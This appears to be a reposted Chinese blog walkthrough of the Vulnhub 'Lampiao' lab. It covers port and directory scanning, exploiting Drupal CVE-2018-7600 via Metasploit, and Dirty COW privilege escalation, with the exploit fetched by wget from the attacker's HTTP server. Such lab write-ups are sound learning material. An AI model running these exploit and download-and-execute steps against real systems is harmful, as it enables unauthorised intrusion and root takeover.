准备阶段
Kali版本:2022.3
目标主机ip:192.168.186.148
攻击机ip:192.168.186.147
vulnhub和vulhub不同,无需安装环境。
lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249
下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式
登陆界面如下,此时账户密码未知,需要我们去找啦
复现过程:
1、使用nmap命令对网段进行扫描,以确定lampiao靶机具体的ip地址。
ssh:远程连接
nmap -sS -Pn 192.168.186.0/24
//-sS SYN扫描,使用最频繁,安全、快
//-Pn 目标机禁用ping,绕过ping扫描
2、分别访问22端口(无法访问)和80端口(如图)
3、具体扫描一下该ip所有端口号,有新发现,访问该端口
nmap 192.168.186.148 -p1-65535
思路一:
1)点击两个“read more”,分别显示?q=node/1和?q=node/3。
2)唯独没有?q=node/2,试着访问一下,显示有两个文件
3)访问qrc.png,这里我用了离线识别二维码的小工具,大家也可以用微信扫描。
4)没什么有用信息,所以我们去听音频。得到user:tiago
思路二:
1)通过dirsearch对该端口进行目录扫描,得到以下文件
dirsearch -u http://192.168.186.148:1898 #-u 指定网址
2)访问CHANGE.txt文件,发现cms框架信息为Drupal 7.54
3)百度看到有CVE-2018-7600远程代码执行漏洞
4)使用msf,查找CVE-2018-7600漏洞
msfconsole
search CVE-2018-7600
5)选中该漏洞,并设置好目标
use 0
show options #可以查到当前配置信息,需要配置目标主机的ip地址和端口
set rhosts 192.168.186.148 #设置目标地址
set rport 1898 #设置端口
show options
6)运行,可以输入命令测试
run
shell #转换为有回显的shell
7)查看所有文件,但是无法访问root文件夹,此时需要提升权限。
ls -al #列出所有文件,包括隐藏文件
cd root
脏牛提权:
1、通过searchsploit工具找到提权脚本,定位40847.cpp,下载到/tmp目录
searchsploit dirty
locate linux/local/40847.cpp #定位40847.cpp的位置
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp #将40847.cpp复制到/tmp目录下
2、首先进入tmp目录,然后开启http服务,选用8080端口
python -m http.server 8080
3、在目标主机下载40847.cpp文件,并进行编译成40847可执行文件
wget http://192.168.186.147:8080/40847.cpp
4、执行该文件,可以得到root用户对应的密码!!
./40847
5、去lampiao靶机登录,用户名root,密码dirtyCowFun,去查看所有文件,成功找到flag~
ls -al
cat flag.txt
参考的大佬博客链接:
vulnhub--lampiao(脏牛提权)_鲨鱼辣椒k的博客-CSDN博客_脏牛提权
Lampiao_无人问津的椰子的博客-CSDN博客
完结撒花*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。~!
又肝了好几个小时,遇到了很多问题,记录的过程对脏牛提权有了更加深入和清晰的认识啦~
希望能帮助到和我一样是小白的同学们捏~( ̄▽ ̄)~*文章来源:https://www.toymoban.com/news/detail-813191.html
文章来源地址https://www.toymoban.com/news/detail-813191.html
到了这里,关于Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!